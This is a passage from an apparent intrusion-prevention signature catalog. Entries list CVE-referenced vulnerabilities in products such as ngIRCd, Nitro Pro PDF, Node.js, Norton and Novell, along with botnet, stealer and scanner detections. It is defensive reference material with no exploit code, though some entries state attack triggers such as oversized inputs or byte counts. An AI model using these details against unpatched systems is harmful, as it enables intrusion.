A stored cross-site scripting vulnerability has been reported for NginxProxyManager. This vulnerability is due to improper input validation for Proxy Host domain names. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

File-Text_NginxProxyManager-Proxy-Host-Stored-Cross-Site-Scripting

References:

CVE-2022-28379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28379

NgIRCd-Log-Resolver-Format-String-Vulnerability

About this vulnerability:

Format string vulnerability in ngIRCd Log_Resolver function

Risk:

High

First detected in:

sgpkg-ips-21-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ngIRCd

Type:

Buffer Overflow

Description:

ngIRCd Internet Relay Chat (IRC) daemon contains a format string vulnerability in the Log_Resolver function. A remote attacker can exploit this vulnerability by sending a malicious response to the daemons AUTH/IDENT request, which may lead to the execution of arbitrary code on the server.

Situation:

Generic_NgIRCd-Log-Resolver-Format-String-Vulnerability

References:

CVE-2005-0226
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0226

BID-12434
http://www.securityfocus.com/bid/12434

OSVDB-13444
http://www.osvdb.org/13444

Ngrbot

About this vulnerability:	NGRBot
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	NGRBot is a worm that spreads through various messaging and social networking platforms. It uses IRC to send and receive commands and can be used to cause a denial of service attack.
Situation:	Generic_CS-IRC-Ngrbot-Activity-Detected

NI-Flexlogger-Flxproj-File-Parsedatavalueasxmlhierarchy-Insecure-Deserialization

About this vulnerability:

A vulnerability in National Instruments FlexLogger

Risk:

Moderate

First detected in:

sgpkg-ips-1772-5242

Last changed:

sgpkg-ips-1772-5242

Platform:

Generic

Software:

National Instruments FlexLogger; National Instruments InstrumentStudio

Type:

Input Validation

Description:

Insecure deserialization of data in FLXPROJ files causes a vulnerability in NI FlexLogger. A successful exploitation allows an attacker to execute arbitrary code on the target system.

Situation:

File-TextId_NI-Flexlogger-Flxproj-File-Parsedatavalueasxmlhierarchy-Insecure-Deserialization

References:

CVE-2024-4044
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4044

NightFury-Infection-Traffic

About this vulnerability:	NightFury infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1378-5242
Last changed:	sgpkg-ips-1378-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	NightFury infection traffic was detected.
Situation:	Generic_TCP-NightFury-Infection-Traffic

Nikto-Web-Vulnerability-Scanner

About this vulnerability:	Nikto
Risk:	Moderate
First detected in:	sgpkg-ips-442-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Vulnerability Scanner
Description:	Nikto is a vulnerability scanner designed to verify whether known vulnerabilities are found in webservers.
Situation:	HTTP_CS-Put-Nikto-Test HTTP_CSU-Upload.cgi-Detect HTTP_CSU-Nikto-Ipconfig.exe-Scan-Detect HTTP_CSU-Nikto-Scan-Detect HTTP_CSH-Nikto-Scan-Detect-By-User-Agent HTTP_CSH-w3af-Scan-Detect-By-User-Agent

Nipper-Buffer-Overflow-CVE-2019-17424

About this vulnerability:

An attempt to exploit a vulnerability in nipper-ng detected

Risk:

High

First detected in:

sgpkg-ips-1771-5242

Last changed:

sgpkg-ips-1771-5242

Platform:

Generic

Software:

nipper-ng

Type:

Input Validation

Description:

A stack-based buffer overflow in the processPrivilage() function in IOS/process-general.c in nipper-ng 0.11.10 allows remote attackers (serving firewall configuration files) to achieve remote code execution or denial-of-service (DoS) via a crafted file.

Situation:

File-Binary_Nipper-Buffer-Overflow-CVE-2019-17424

References:

CVE-2019-17424
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17424

NIPrint-Lpd-Lpr-Server-BOF

About this vulnerability:

Buffer overflow in NIPrint LPD-LPR Server

Risk:

High

First detected in:

sgpkg-ips-15-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Network Instruments NIPrint LPD-LPR Print Server

Type:

Buffer Overflow

Description:

NIPrint LPD-LPR Print Server is vulnerable to a buffer overflow. By sending 60 bytes to port 515, a remote attacker could overflow a buffer and possibly execute arbitrary code on the system.

Situation:

Printer_NIPrint-Lpd-Lpr-Server-BOF-1
Printer_NIPrint-Lpd-Lpr-Server-BOF-2
Printer_NIPrint-Lpd-Lpr-Server-BOF-3

References:

CVE-2003-1141
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1141

BID-8969
http://www.securityfocus.com/bid/8969

OSVDB-2774
http://www.osvdb.org/2774

Nitol

About this vulnerability:	Nitol
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Nitol is a Botnet used for generating Distributed Denial of Service (DDoS) attacks.
Situation:	Generic_CS-Nitol-Activity

Nitro-Pro-PDF-Iccbased-ColorSpace-Stroke-Color-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Nitro PDF Nitro Pro

Risk:

Moderate

First detected in:

sgpkg-ips-1298-5242

Last changed:

sgpkg-ips-1298-5242

Platform:

Generic

Software:

Nitro Pro PDF

Type:

Buffer Overflow

Description:

A heap-based overflow vulnerability has been reported in Nitro Pro PDF. The vulnerability occurs while processing an ICCBased ColorSpace from a PDF document. A remote, unauthenticated attacker can exploit this vulnerability by enticing the victim into opening specially crafted PDF files. Successful exploitation could result in out-of-bounds write on the heap which could lead to remote code execution within the context of the target user.

Situation:

File-PDF_Nitro-Pro-PDF-Iccbased-ColorSpace-Stroke-Color-Heap-Based-Buffer-Overflow

References:

CVE-2020-6146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6146

Nitro-Pro-PDF-Indexed-ColorSpace-Integer-Overflow

About this vulnerability:

A vulnerability in Nitro Pro PDF

Risk:

High

First detected in:

sgpkg-ips-1294-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Nitro Pro PDF

Type:

Integer Overflow

Description:

There exists a vulnerability in Nitro Pro PDF, versions 13.22.0.414 and before, which allows remote attackers to execute arbitrary code by sending a specially crafted PDF file, due to an integer overflow vulnerability that occurs while processing an Indexed ColorSpace from a PDF document, causing an out-of-bounds write and memory corruption.

Situation:

File-PDF_Nitro-Pro-PDF-Indexed-ColorSpace-Integer-Overflow

References:

CVE-2020-6116
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6116

Nitro-Pro-PDF-Nested-Pages-Use-After-Free

About this vulnerability:

A vulnerability in Nitro PDF Nitro Pro

Risk:

Moderate

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nitro Pro PDF

Type:

Malfunction

Description:

An use-after-free vulnerability has been reported in Nitro Pro PDF. This vulnerability is due to improper handling of page objects. A remote attacker could exploit this vulnerability by enticing a victim user to visit a malicious web page or open a crafted PDF document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.

Situation:

File-PDF_Nitro-Pro-PDF-Nested-Pages-Use-After-Free

References:

CVE-2020-6074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6074

Nitro-Pro-PDF-Object-Stream-Parsing-Number-Of-Objects-Integer-Overflow

About this vulnerability:

A vulnerability in Nitro PDF Nitro Pro

Risk:

Moderate

First detected in:

sgpkg-ips-1289-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nitro Pro PDF

Type:

Integer Overflow

Description:

An integer overflow vulnerability has been reported in Nitro Pro PDF. The vulnerability occurs while processing an object stream from a PDF document. A remote, unauthenticated attacker can exploit this vulnerability by enticing the victim into opening specially crafted PDF files. Successful exploitation could result in out-of-bounds read and memory corruption which could lead to remote code execution within the context of the target user.

Situation:

File-PDF_Nitro-Pro-PDF-Object-Stream-Parsing-Number-Of-Objects-Integer-Overflow

References:

CVE-2020-6113
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6113

Nitro-Pro-PDF-Pattern-Object-Integer-Overflow

About this vulnerability:

A vulnerability in Nitro PDF Nitro Pro

Risk:

Moderate

First detected in:

sgpkg-ips-1261-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nitro Pro PDF

Type:

Integer Overflow

Description:

Improper handling of a BBox property in a Pattern object causes an integer overflow vulnerability in Nitro Pro PDF. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the affected program.

Situation:

File-PDF_Nitro-Pro-PDF-Pattern-Object-Integer-Overflow

References:

CVE-2020-6092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6092

Nitro-Stealer-Infection-Traffic

About this vulnerability:	Nitro Stealer infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1396-5242
Last changed:	sgpkg-ips-1396-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Nitro Stealer infection traffic was detected.
Situation:	HTTP_CRL-Nitro-Stealer-Infection-Traffic

NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow

About this vulnerability:

An attempt to exploit a vulnerability in NJStar Communicator's MiniSMTP Server detected

Risk:

High

First detected in:

sgpkg-ips-655-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

NJStar Communicator MiniSMTP

Type:

Buffer Overflow

Description:

A Buffer Overflow vulnerability in NJStar Communicator 3.0, within MiniSMTP server, which allows remote attackers to execute arbitrary commands via vectors related to the p_ class in OFS/misc_.py and the use of Python modules.

Situation:

SMTP_CS-NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow
Generic_CS-NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow

References:

CVE-2011-4040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4040

OSVDB-76728
http://www.osvdb.org/76728

NLnet-Labs-Unbound-Notify-Queries-Denial-Of-Service

About this vulnerability:

A vulnerability in NLnet Labs Unbound

Risk:

High

First detected in:

sgpkg-ips-1462-5242

Last changed:

sgpkg-ips-1462-5242

Platform:

Generic

Software:

NLnet Unbound

Type:

Malfunction

Description:

A denial-of-service vulnerability has been reported in Unbound DNS server. The vulnerability is due to the use of uninitialized stack variables when processing certain NOTIFY queries. A remote attacker could exploit this vulnerability by providing a crafted response to a vulnerable server. Successful exploitation leads to a denial-of-service condition.

Situation:

DNS-UDP_NLnet-Labs-Unbound-Notify-Queries-Denial-Of-Service

References:

CVE-2019-16866
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16866

NMAP-Web-Scanning-Activity

About this vulnerability:	Nmap network scanner's activities detected
Risk:	High
First detected in:	sgpkg-ips-1825-5242
Last changed:	sgpkg-ips-1826-5242
Platform:	Generic
Software:	Nmap
Type:	Input Validation
Description:	Nmap is a popular network scanner that is used for host discovery and service and operating system detection. This fingerprint detects Nmap's web scanning activities.
Situation:	HTTP_CSU-NMAP-Web-Scanning-Activity HTTP_CSH-NMAP-Web-Scanning-Activity

NNTP-Cassandra-Nntpserver-BOF

About this vulnerability:

Cassandra NNTP Server denial of service

Risk:

Moderate

First detected in:

sgpkg-ips-105-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Atrium Software Cassandra NNTP Server

Type:

Buffer Overflow

Description:

Cassandra NNTP Server contains a buffer overflow vulnerability, that allows remote users to cause a denial-of-service attack. The buffer overflow happens when a login name of over 10,000 characters is encountered.

Situation:

NNTP_Cassandra-Server-Login-Denial-Of-Service

References:

CVE-2000-0341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0341

BID-1156
http://www.securityfocus.com/bid/1156

NNTP-Outlook-Express-List-Command-Response-Buffer-Overflow

About this vulnerability:

Outlook Express fails to parse responses to the LIST command safely

Risk:

High

First detected in:

sgpkg-ips-31-1210

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft Outlook Express

Type:

Buffer Overflow

Description:

Microsoft Outlook Express does not safely parse long replies to a NNTP list command, leading to a buffer overflow. The vulnerability allows a malicious server to execute arbitrary code on any Outlook Express clients requesting a list of newsgroups. User action is required to exploit the vulnerability, but many versions of Windows use Outlook Express as the default handler for a "news://" URI which makes it easier to trick victims to connect to a malicious server.

Situation:

NNTP_Outlook-Express-List-Command-Response-Buffer-Overflow

References:

CVE-2005-1213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1213

BID-13951
http://www.securityfocus.com/bid/13951

MS05-030
http://technet.microsoft.com/security/bulletin/MS05-030

NodCMS-Edit_Lang_File-PHP-Code-Execution

About this vulnerability:	A vulnerability in NodCMS
Risk:	Moderate
First detected in:	sgpkg-ips-824-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	NodCMS
Type:	Malfunction
Description:	A command injection vulnerability in NodCMS.
Situation:	HTTP_CRL-NodCMS-Edit_Lang_File-PHP-Code-Execution

Node.js-Foundation-Node.js-TLS-Denial-Of-Service

About this vulnerability:

A vulnerability in Node.js

Risk:

Moderate

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Node.js

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in Node.js. The vulnerability is due to improper handling of TLS by the node process. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted message to the target server during a TLS handshake. Successful exploitation would result in the target system abnormally terminating.

Situation:

HTTPS_CS-Node.js-Foundation-Node.js-TLS-Denial-Of-Service

References:

CVE-2018-7162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7162

Node.js-Foundation-Node.js-Zlib-Windowbits-Denial-Of-Service

About this vulnerability:

A vulnerability in Node.js Node.js

Risk:

Moderate

First detected in:

sgpkg-ips-1036-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Node.js

Type:

Malfunction

Description:

There has been reported a denial of service vulnerability in Node.js. Newer versions of zlib don't allow a value of 8 for windowBits, which leads to crashes. By sending a specially crafted WebSocket client requests to a target server, a remote attacker can cause a denial of service state in a target system.

Situation:

HTTP_CS-Node.js-Foundation-Node.js-Zlib-Windowbits-Denial-Of-Service

References:

CVE-2017-14919
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14919

Node.js-Llhttp-Module-Transfer-Encoding-Handling-HTTP-Request-Smuggling

About this vulnerability:

A vulnerability in Node.js

Risk:

High

First detected in:

sgpkg-ips-1493-5242

Last changed:

sgpkg-ips-1493-5242

Platform:

Generic

Software:

Node.js

Type:

Input Validation

Description:

An HTTP request smuggling vulnerability has been reported in Node.js. The vulnerability is due to improper input validation of Transfer-Encoding headers in incoming HTTP requests. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in access to confidential information, passwords and session cookies. In the worst case an attacker could impersonate valid users and gain unrestricted access to the system.

Situation:

HTTP_CSH-Node.js-Llhttp-Module-Transfer-Encoding-Handling-HTTP-Request-Smuggling

References:

CVE-2022-32213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32213

Node.js-Systeminformation-Library-Command-Injection-CVE-2021-21315

About this vulnerability:

An attempt to exploit a vulnerability in Node.js systeminformation library

Risk:

High

First detected in:

sgpkg-ips-1428-5242

Last changed:

sgpkg-ips-1428-5242

Platform:

Generic

Software:

Node.js

Type:

Code Injection

Description:

There has been reported a command injection vulnerability in the systeminformation library for Node.js.

Situation:

HTTP_CSU-Node.js-Systeminformation-Library-Command-Injection-CVE-2021-21315

References:

CVE-2021-21315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21315

NodeBB-Socket.io-Elevation-Of-Privilege

About this vulnerability:

A vulnerability in NodeBB

Risk:

High

First detected in:

sgpkg-ips-1566-5242

Last changed:

sgpkg-ips-1566-5242

Platform:

Generic

Software:

NodeBB

Type:

Input Validation

Description:

An elevation of privilege vulnerability has been reported in NodeBB. The vulnerability is due to insufficient validation of messages sent to the socket.io module. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in elevation of privilege.

Situation:

File-Text_NodeBB-Socket.io-Elevation-Of-Privilege
WebSocket_CS-NodeBB-Socket.io-Elevation-Of-Privilege

References:

CVE-2022-46164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46164

NodeBB-Socket.io-Eventname-Denial-Of-Service

About this vulnerability:

A vulnerability in NodeBB

Risk:

High

First detected in:

sgpkg-ips-1643-5242

Last changed:

sgpkg-ips-1643-5242

Platform:

Generic

Software:

NodeBB

Type:

Input Validation

Description:

A denial of service vulnerability has been reported in NodeBB. The vulnerability is due to insufficient validation of Socket.IO packet event names. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in a denial of service condition.

Situation:

File-Text_NodeBB-Socket.io-Eventname-Denial-Of-Service
WebSocket_CS-NodeBB-Socket.io-Eventname-Denial-Of-Service

References:

CVE-2023-30591
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30591

Nodejs-JS-YAML-Load-Code-Execution

About this vulnerability:

Node.js js-yaml load() Code Execution

Risk:

Moderate

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Node.js

Type:

Javascript Injection

Description:

Js-yaml -module of node.js does not handle the unsafe !!js/function tag properly. This may lead to execution of arbitrary javascript code.

Situation:

File-Text_Nodejs-JS-YAML-Load-Code-Execution

References:

CVE-2013-4660
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4660

BID-60867
http://www.securityfocus.com/bid/60867

OSVDB-94656
http://www.osvdb.org/94656

Non-Standard-Port-In-Iframe-Src-Attribute

About this vulnerability:	Non-standard port in src attribute of an iframe
Risk:	Moderate
First detected in:	sgpkg-ips-500-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic browser
Type:	Malfunction
Description:	Hypertext Markup Language (HTML) contains an inline frame feature. This feature can be used to include other pages in the current page. The src attribute is used to define the address (URL) of the embedded page. The page defined in the src attribute is normally retrieved over the default HTTP/HTTPS port (80/443), but any port can be defined in the URL. It is legitimate to use a non-standard port, but malicious, injected iframes are known to use non-standard ports in order to evade detection devices.
Situation:	File-Text_Non-Standard-Port-In-Iframe-Src-Attribute

nopCommerce-nopCommerce-BackupAction-Directory-Traversal

About this vulnerability:

A vulnerability in nopCommerce.

Risk:

High

First detected in:

sgpkg-ips-1467-5242

Last changed:

sgpkg-ips-1467-5242

Platform:

Linux; Unix

Software:

nopCommerce

Type:

Directory Traversal

Description:

A vulnerability in nopCommerce, versions prior to 4.50.2, which allows remote attackers to cause a denial of service condition on the target server by sending a crafted request, due to a directory traversal in the BackupAction function.

Situation:

HTTP_CS-nopCommerce-nopCommerce-BackupAction-Directory-Traversal

References:

CVE-2022-28451
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-28451

NorthStar-C2-XSS-To-Agent-RCE

About this vulnerability:

An attempt to exploit a vulnerability in NorthStar C2 detected

Risk:

High

First detected in:

sgpkg-ips-1731-5242

Last changed:

sgpkg-ips-1731-5242

Platform:

Windows

Software:

NorthStar

Type:

Input Validation

Description:

A vulnerability in NorthStar C2, prior to commit 7674a44, which allows remote attackers to upload and exexute malicious scripts via agent IDs, due to insufficient validation.

Situation:

HTTP_CSU-NorthStar-C2-XSS-To-Agent-RCE

References:

CVE-2024-28741
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28741

Norton-AntiVirus-ActiveX-Denial-Of-Service

About this vulnerability:

A vulnerability in Norton AntiVirus

Risk:

High

First detected in:

sgpkg-ips-419-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Norton AntiVirus

Type:

Resource Starvation

Description:

There is a denial of service condition within an ActiveX object that is included within Norton Antivirus 2004. An attacker can create a page that instantiates the vulnerable ActiveX object and then creates a denial of service conditionon the victim computer. It has also been reported that arbitrary code can be executed on the remote client if the path of the executable is already known.

Situation:

File-Text_Norton-AntiVirus-ActiveX-Denial-Of-Service

References:

CVE-2004-0487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0487

BID-10392
http://www.securityfocus.com/bid/10392

OSVDB-6303
http://www.osvdb.org/6303

Norton-AntiVirus-Decompression-Bomb-Denial-Of-Service

About this vulnerability:	A vulnerability in Symantec Mail Security
Risk:	Moderate
First detected in:	sgpkg-ips-436-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Symantec Norton AntiVirus
Type:	Malfunction
Description:	There is a vulnerability in the way Norton AntiVirus products treat compressed archive files (e.g., zip) that are infected with a virus. During the disinfection of a specially crafted archive containing a known virus, the vulnerable products consume 100% of the CPU, creating a denial of service condition. The vulnerable software consumes 100% of the CPU for a long period until the rebuilding of malicious archive file is finished. On a client system, this will result in a system slowdown. The system is still under protection when opening other resources that are automatically scanned by Norton AntiVirus (e.g. incoming email, file downloads, etc.). Manual scanning cannot be performed by a user until the rebuilding processes is complete, or kill and restart AntiVirus process to perform other manual scanning job. On a system configured with Norton antivirus products for servers, such as mail servers, it significantly slows down one scan thread, multiple attacks could eventually put all available threads in long run period therefore other legitimate connections to the service may be refused. This can stop e-mail delivery, and so on.
Situation:	File-Zip_Norton-AntiVirus-Decompression-Bomb-Denial-Of-Service

Norton-Internet-Security-2004-Symspam.dll-BOF

About this vulnerability:

A vulnerability in Symantec Norton Internet Security

Risk:

High

First detected in:

sgpkg-ips-370-4219

Last changed:

sgpkg-ips-1583-5242

Platform:

Windows

Software:

Symantec Norton Internet Security

Type:

Buffer Overflow

Description:

Norton Internet Security 2004 is vulnerable to a buffer overflow attack. If an attacker is able to entice a victim to access a malicious web page or e-mail, it is possible for the attacker to run arbitrary code in the context of LOCAL_SYSTEM. Due to a bounds check failure of the parameter within the vulnerable LaunchCustomRuleWizard() function, if the malicious code is executed (through a browser or e-mail client), a buffer is overrun and will cause the underlying browser or e-mail client to fail. If properly crafted, it is possible for the remote attacker to execute arbitrary code on the remote client, running in the LOCAL_SYSTEM context.

Situation:

HTTP_SS-Norton-Internet-Security-2004-Symspam.dll-BOF

References:

CVE-2004-0363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0363

BID-9916
http://www.securityfocus.com/bid/9916

Norton-Internet-Security-NBNS-Response-Processing-Stack-Overflow

About this vulnerability:

A vulnerability in Norton Internet Security

Risk:

High

First detected in:

sgpkg-ips-419-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Symantec Norton Internet Security; Symantec Norton Personal Firewall; Symantec Norton AntiSpam

Type:

Buffer Overflow

Description:

Symantec Firewall product line is vulnerable to a stack buffer overflow attack in the processing of a specially crafted NetBIOS Name Service Response message. If an attacker is able to send a single UDP datagram with a source port of 137 to a vulnerable host, and the victim allows the incoming UDP datagram, it is possible for the attacker to run arbitrary code with kernel privileges.

Situation:

Generic_UDP-Norton-Internet-Security-NBNS-Response-Processing-Stack-Overflow

References:

CVE-2004-0444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0444

BID-10335
http://www.securityfocus.com/bid/10335

BID-10334
http://www.securityfocus.com/bid/10334

BID-10333
http://www.securityfocus.com/bid/10333

OSVDB-6102
http://www.osvdb.org/6102

OSVDB-6101
http://www.osvdb.org/6101

OSVDB-6099
http://www.osvdb.org/6099

Norton-Internet-Security-Remote-Command-Execution

About this vulnerability:

A vulnerability in Norton Internet Security

Risk:

High

First detected in:

sgpkg-ips-416-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Symantec Norton Internet Security

Type:

Input Validation

Description:

A vulnerability exists in Norton Internet Security products allowing for remote command execution. WrapNISUM, an ActiveX component, can be used in JavaScript and VBScript script to run arbitrary executables on the target via its LaunchURL() method.

Situation:

File-Text_Norton-Internet-Security-Remote-Command-Execution

References:

CVE-2004-0364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0364

BID-9915
http://www.securityfocus.com/bid/9915

Nostromo-Directory-Traversal

About this vulnerability:

A vulnerability in Nostromo

Risk:

High

First detected in:

sgpkg-ips-1200-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Unix

Software:

Nostromo

Type:

Directory Traversal

Description:

A vulnerability in Nostromo, versions 1.9.6 and before, which allows remote attackers to execute arbitrary code and retrieve sensitive files via directory traversal.

Situation:

HTTP_CSU-Nostromo-Directory-Traversal

References:

CVE-2019-16278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16278

Nostromo-Nhttpd-HTTP_Header_comp-Buffer-Overflow

About this vulnerability:

A vulnerability in Nostromo nhttpd

Risk:

High

First detected in:

sgpkg-ips-1212-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Nostromo

Type:

Buffer Overflow

Description:

A stack-based buffer overflow vulnerability has been reported in the http_header_comp function of Nostromo nhttpd server. The vulnerability is due to improper boundary checking on part of the application while processing user input. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request to the target server. Successful exploitation could result in denial of service conditions and, in the worst case, arbitrary code execution.

Situation:

HTTP_CS-Nostromo-Nhttpd-HTTP_Header_comp-Buffer-Overflow

References:

CVE-2019-16279
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16279

Novell-Casa-PAM-Module-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell CASA

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Novell CASA

Type:

Buffer Overflow

Description:

There is a vulnerability in the Common Authentication Service Adapter (CASA) PAM module produced by Novell. The vulnerability can be triggered by providing an overly long user name or password to the module which results in a stack buffer overflow. An attacker may leverage this issue to compromise a vulnerable host system. In an attack case where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature of the injected code. Any code injected into the vulnerable component would execute in the security context of the current service, which is root by default. If such attack fails, the behaviour depends on the service used in order to carry the attack. However, independent of the service used, the following error message is logged in the system logs: sshd[28836]: fatal: PAM: authentication thread exited unexpectedly In case of an unsuccessful attack over the SSH protocol, the current session will be terminated by the SSH server, however, the service will continue to function.

Situation:

SSH_Novell-Casa-PAM-Module-Stack-Buffer-Overflow

References:

CVE-2006-0736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0736

BID-16779
http://www.securityfocus.com/bid/16779

Novell-Client-NetIdentity-Agent-Pointer-Dereference-Code-Execution

About this vulnerability:

A code execution vulnerability in Novell Client NetIdentity Agent

Risk:

Moderate

First detected in:

sgpkg-ips-262-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell NetIdentity Agent

Type:

Malfunction

Description:

There is a code execution vulnerability in the Novell Client NetIdentity Agent. By sending a crafted RPC request to the XTIERRPCPIPE pipe of a vulnerable Novell Client NetIdentity agent, an authenticated attacker can execute arbitrary code with the privileges of the affected service, which is SYSTEM by default.

Situation:

SMB-TCP_Novell-Client-NetIdentity-Agent-Pointer-Dereference-Exploit

References:

CVE-2009-1350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1350

BID-34400
http://www.securityfocus.com/bid/34400

OSVDB-53351
http://www.osvdb.org/53351

Novell-Client-Printer-Spooler-Service-Request-Server-Name-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell Netware Client

Risk:

High

First detected in:

sgpkg-ips-466-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell Client

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Novell Client for Windows. The vulnerability is due to insufficient validation of server name parameter with specific remote requests. A remote attacker may exploit the vulnerability with a crafted message leading to code execution within the context of the SYSTEM user.

Situation:

MSRPC-TCP_Novell-Client-Printer-Spooler-Service-EnumPrinterDrivers-Server-Name

References:

CVE-2007-2954
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2954

BID-25474
http://www.securityfocus.com/bid/25474

OSVDB-37321
http://www.osvdb.org/37321

Novell-Client-Printer-Spooler-Service-Server-Name-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell Netware Client

Risk:

High

First detected in:

sgpkg-ips-466-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Novell Client

Type:

Buffer Overflow

Description:

Situation:

MSRPC-TCP_Novell-Client-Printer-Spooler-Service-EnumPrinters-Server-Name

References:

CVE-2006-5854
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5854

BID-21220
http://www.securityfocus.com/bid/21220

Novell-Configuration-Management-Tftpd-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Novell ZENworks Configuration Management

Risk:

High

First detected in:

sgpkg-ips-378-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Novell ZENworks Configuration Management

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Novell ZENworks Configuration Management.

Situation:

TFTP_CS-Novell-Configuration-Management-Tftpd-Heap-Buffer-Overflow

References:

CVE-2010-4323
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4323

BID-46434
http://www.securityfocus.com/bid/46434

Novell-Distributed-Print-Services-Integer-Overflow

About this vulnerability:

A vulnerability in Novell Netware

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Novell NetWare

Software:

<os>

Type:

Input Validation

Description:

